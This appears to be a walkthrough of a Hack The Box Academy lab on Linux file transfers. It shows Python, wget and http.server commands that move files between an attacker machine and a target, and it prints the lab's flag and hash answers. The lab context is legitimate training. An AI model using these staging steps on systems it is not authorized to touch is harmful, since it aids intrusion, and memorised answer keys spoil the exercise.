Linux File Transfer Methods — File Transfers Module — HTB Walk-Through

TIER 0 MODULE: FILE TRANSFERS

SECTION: Linux File Transfer Methods

Please open your pwnbox or connect to the vpn, in order to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.

import requests; print(requests.get("http://<target-ip>/flag.txt").text)
# Make sure you delete the previous flag.txt file.

After successfully downloaded, view the content of the file.

cat flag.txt

Answer: 5d21cf3da9c0ccb94f709e2559f3ea50

2. Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run “hasher <extracted file>” from the command line. Submit the generated hash as your answer.

Download the file to the attacker machine:

wget https://academy.hackthebox.com/storage/modules/24/upload_nix.zip

SSH to the target:

ssh htb-user@<target-ip>

I tried to wget the file from the target machine, but it did not permit. So, I setup a webserver via python on my attacker machine.

python3 -m http.server

Then I accessed the “Python Server” from the target machine, and downloaded the upload_nix.zip via wget.

wget <attacker-ip>:8000/upload_nix.zip
# Run the Command on the target machine.

After successful download, I extracted via gunzip:

gunzip -S .zip upload_nix.zip

Finally, check the hash:

hasher upload_nix.zip

Answer: 159cfe5c65054bbadb2761cfa359c8b0

Still Stuck? Watch the video!

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)

The Malware Mender Walk-Throughs